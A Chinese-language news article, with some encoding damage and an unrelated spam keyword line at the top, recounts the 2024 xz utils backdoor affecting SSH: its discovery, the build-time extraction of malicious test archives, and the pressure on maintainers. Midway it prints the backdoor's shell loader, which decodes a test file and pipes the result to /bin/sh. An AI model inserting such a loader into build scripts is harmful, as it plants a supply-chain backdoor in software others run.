自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

安全專家對 SSH 漏洞感到恐慌

安全
在過去的幾個月里,每個人都在談?wù)?SSH 中觸發(fā)的漏洞。通常對它的描述相當(dāng)復(fù)雜。這只是某個隨機(jī)應(yīng)用程序中的另一個漏洞嗎?如果是這樣,為什么網(wǎng)絡(luò)安全專家如此關(guān)注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

SSH 中觸發(fā)的漏洞可以允許黑客接管服務(wù)器。安全專家感到恐慌。這次攻擊可能持續(xù)了兩年多,需要大量的資源和技術(shù)技能。

在過去的幾個月里,每個人都在談?wù)?SSH 中觸發(fā)的漏洞。通常對它的描述相當(dāng)復(fù)雜。這只是某個隨機(jī)應(yīng)用程序中的另一個漏洞嗎?如果是這樣,為什么網(wǎng)絡(luò)安全專家如此關(guān)注這一漏洞,而在線論壇上充斥著恐慌的安全專家?讓我們一探究竟!

正如我們在 wiz.io 上讀到的,在 xz utils 的 5.6.0  5.6.1 版本中發(fā)現(xiàn)了一個后門,影響了 SSH。據(jù)我們了解,xz 是一個命令行壓縮工具,由 lzma 和 xz 組成,并影響了 SSH。

2024年3月29日星期五,Andres Freund向Openwall郵件列表發(fā)送了一封電子郵件。郵件列表對于精通技術(shù)的人來說就像Discord一樣,而Openwall是一個保護(hù)開源代碼的項目。

正是在那里,Andres 分享了他令人不安的發(fā)現(xiàn)。

服務(wù)器接管

他當(dāng)時正在使用安全Shell協(xié)議(SSH)進(jìn)行一些工作。對于幾乎每一個需要連接到服務(wù)器的人來說,SSH就像意大利面的叉子一樣。開發(fā)人員、DevOps、SecOps以及技術(shù)領(lǐng)域的每個人都在使用SSH安全地連接到服務(wù)器。即使服務(wù)器也使用SSH連接到其他服務(wù)器。

所以Andres當(dāng)時正在做正常的技術(shù)工作,但有些事情不對勁,不僅僅是2024年橄欖油的價格。當(dāng)他使用SSH登錄到一臺服務(wù)器時,服務(wù)器開始準(zhǔn)備起飛。

風(fēng)扇轉(zhuǎn)動得越來越快,通常安靜的服務(wù)器開始發(fā)出吸氣和打嗝的聲音。在這種時候,人們會檢查他們是否忘記關(guān)閉Windows時鐘應(yīng)用程序,那個耗費(fèi)CPU資源的野獸。

但是Andres使用的是Debian。所以他能夠立即排除這種可能性。此外,他注意到了更多的問題。Valgrind開始報告內(nèi)存出現(xiàn)了一些問題。

這可能是什么原因呢?Windows Explorer突然開始挖掘比特幣了嗎?不可能是這樣的!

通常人們會責(zé)怪服務(wù)器,然后忘記整個問題,但有些事情困擾著Andres,他決定進(jìn)行調(diào)查。

在深入研究之后,他注意到實際上是ssh導(dǎo)致了所有這些癥狀。這很奇怪,因為ssh不顯示廣告,你也不能在上面玩《古墓麗影:決定版》。

那么這個幾乎不消耗卡路里的應(yīng)用程序到底是如何讓服務(wù)器如此劇烈運(yùn)轉(zhuǎn)的呢?

兔子洞深處

兔子洞深處 Andres決定再深入一點(diǎn)。他啟動了診斷工具,越來越接近找出問題的具體原因??隙ㄊ莝sh,但ssh中的哪個具體部分呢?他注意到是xz。

深入下去,發(fā)現(xiàn)xz的一個特定部分導(dǎo)致了CPU和內(nèi)存的狂歡派對——liblzma。

總結(jié)一下。Liblzma是xz命令行工具使用的壓縮庫。SSH使用了該命令行工具。這是計算機(jī)程序中正常的依賴鏈,在這種情況下,正是SSH的深層依賴liblzma導(dǎo)致了問題。

感謝開源,Andres能夠上網(wǎng)查看究竟發(fā)生了什么。他能夠看到Debian的xz utils的源代碼。

Andres發(fā)現(xiàn)了大量關(guān)于惡意代碼如何工作的信息。有兩個測試文件實際上是存檔文件。一個復(fù)雜的操作系統(tǒng)導(dǎo)致這些存檔文件在構(gòu)建過程中被提取出來,并以包含后門的方式修改SSH構(gòu)建,讓黑客可以登錄到服務(wù)器。

有趣的是,Andres發(fā)現(xiàn)這個后門還在開發(fā)中。隨著xz的后續(xù)版本發(fā)布,后門的作者試圖隱藏后門的存在,并實際修復(fù)了導(dǎo)致Valgrind錯誤列表像圣誕樹一樣閃爍的內(nèi)存問題。

幸運(yùn)的是,這個后門的作者相當(dāng)?shù)图?這讓Andres意識到有些不對勁。再過幾天或幾周,就沒人會注意到有什么問題了。

The source code of the backdoor:

####Hello####
#??Z?.hj?
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

特別是因為整個后門程序是以一種隱藏在某些倉庫中、只在特定環(huán)境下激活的方式構(gòu)建的。Debian操作系統(tǒng)是決定使用該后門的一個重要因素。"

后門的影響

安全專家對這一發(fā)現(xiàn)感到震驚,每一天都帶來更多可怕的細(xì)節(jié)。通常當(dāng)你有一臺服務(wù)器,并想要修復(fù)一個安全漏洞時,你可以使用SSH登錄并更新軟件。

但在這種情況下,SSH本身就存在一個后門。在這種情況下該怎么辦?

Wiz.io建議立即停止使用、升級受影響的服務(wù)器或者降級到不存在黑客可乘之機(jī)的版本。美國國家標(biāo)準(zhǔn)與技術(shù)研究院(NIST)對這個漏洞給予了10分的最高評級(滿分10分)。美國國家標(biāo)準(zhǔn)與技術(shù)研究院很少會對漏洞給予如此高的評級。

上一次發(fā)生這種情況是在 2024 年 2 月 21 日,針對 CVE-2024-1709:“ConnectWise ScreenConnect 23.9.7 及之前版本受身份驗證繞過漏洞的影響,該漏洞可能允許攻擊者直接訪問機(jī)密信息或關(guān)鍵系統(tǒng)。”

說 SecOps 目前正面臨困境還算輕描淡寫?,F(xiàn)實情況是非常糟糕的。即使目前沒有關(guān)于針對已經(jīng)設(shè)置的后門的任何主動攻擊信息,形勢依然嚴(yán)峻。

此外,代碼庫中那個令人不安的“Hello World”玩笑似乎暗示這只是類似攻擊的開始,實際上要將后門部署到目前這種程度,已經(jīng)涉及到相當(dāng)復(fù)雜的操作和技術(shù)知識。

這是支持核心維護(hù)者的信號

關(guān)于這次攻擊的所有細(xì)節(jié)都需要被發(fā)現(xiàn),未來也將成為許多學(xué)術(shù)論文的主題。但得益于 Rob Mensching 的努力,我們已經(jīng)能了解到許多內(nèi)容。

一些專家認(rèn)為這并非一次快速攻擊,而是一個經(jīng)過精心策劃的計劃。兩年前,一些人開始持續(xù)向 xz 項目的維護(hù)者施壓,要求將維護(hù)權(quán)交給能夠繼續(xù)項目的新人員。公開的溝通信息表明,還存在一些隱晦的實質(zhì)壓力。

最終,新維護(hù)者接手項目并開展工作,一切都很順利,直到后來被感染的檔案被加入項目。

我不確定那些向原 xz 維護(hù)者施壓的人是否參與其中。也許是,也許不是。不管怎樣,新維護(hù)者就是這樣上任的。同樣,我也不能確定賈譚是否真的就是行動背后的關(guān)鍵人物,因為他/她的系統(tǒng)也可能已經(jīng)被入侵。這里存在很多不確定因素。

由于維護(hù)者的系統(tǒng)也可能被攻陷,這方面存在很多不確定性。

這里強(qiáng)調(diào)的一個重要問題是核心庫的維護(hù)者有多脆弱。我們所有人都依賴這些庫,但他們通常無法從這項工作中獲得收入,可能處于失業(yè)狀態(tài),可能身陷危機(jī),或面臨困境。

這些維護(hù)者沒有得到他們所需的所有資源,這是無法接受的。我們需要一種解決方案,讓整個社區(qū)(包括企業(yè))全面地物質(zhì)上支持這些人,并提供他們需要的建議,使他們能夠?qū)W⒂谧约旱捻椖慷幌萑肴魏蜗葳?。在這個案例中,如果原維護(hù)者能繼續(xù)項目工作,他本可以立即阻止漏洞的產(chǎn)生!

開源萬歲

得益于所有相關(guān)部分的開源性質(zhì),我們得以深入了解這次后門攻擊。如果無法查看源代碼,安德烈斯就無法如此迅速地向世界發(fā)出警報。對于封閉系統(tǒng)來說,從創(chuàng)建漏洞報告到公司復(fù)現(xiàn)、調(diào)查和修復(fù)可能需要數(shù)周甚至數(shù)月,導(dǎo)致后門在野外持續(xù)更長時間。

由于我們知道黑客引入后門的每一步操作,開源開發(fā)者和調(diào)查人員將能夠封堵這一路上開啟的每一扇門。這意味著即使如此復(fù)雜的攻擊可能發(fā)生,潛在的攻擊面也會被封鎖。

在這場戰(zhàn)斗中,開源就像一個自愈的生物,在每次病毒侵襲后變得愈加強(qiáng)大。當(dāng)然,我們?nèi)孕枰^續(xù)改進(jìn)。

責(zé)任編輯:姜華 來源: 大遷世界
相關(guān)推薦

2024-11-11 13:27:02

2021-04-14 09:50:48

零日漏洞漏洞網(wǎng)絡(luò)安全

2012-01-18 10:45:42

2009-07-17 16:38:40

2012-02-24 15:14:23

ibmdw

2014-04-10 18:48:16

OpenSSLHeartbleed漏

2009-11-06 13:34:53

2021-09-10 10:42:40

蘋果漏洞安全研究人員

2009-04-24 11:03:40

2013-11-18 09:44:02

2014-03-25 14:54:48

2009-04-20 20:29:18

LinuxDellUbuntu

2021-12-27 15:41:23

macOS漏洞惡意軟件

2022-12-15 07:48:33

2009-12-04 19:14:50

2022-06-16 15:56:57

安全專家微軟漏洞

2024-05-09 08:50:39

React編譯器工具

2009-04-21 08:56:14

微軟鮑爾默Sun

2013-06-27 17:30:37

2009-03-23 09:41:11

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號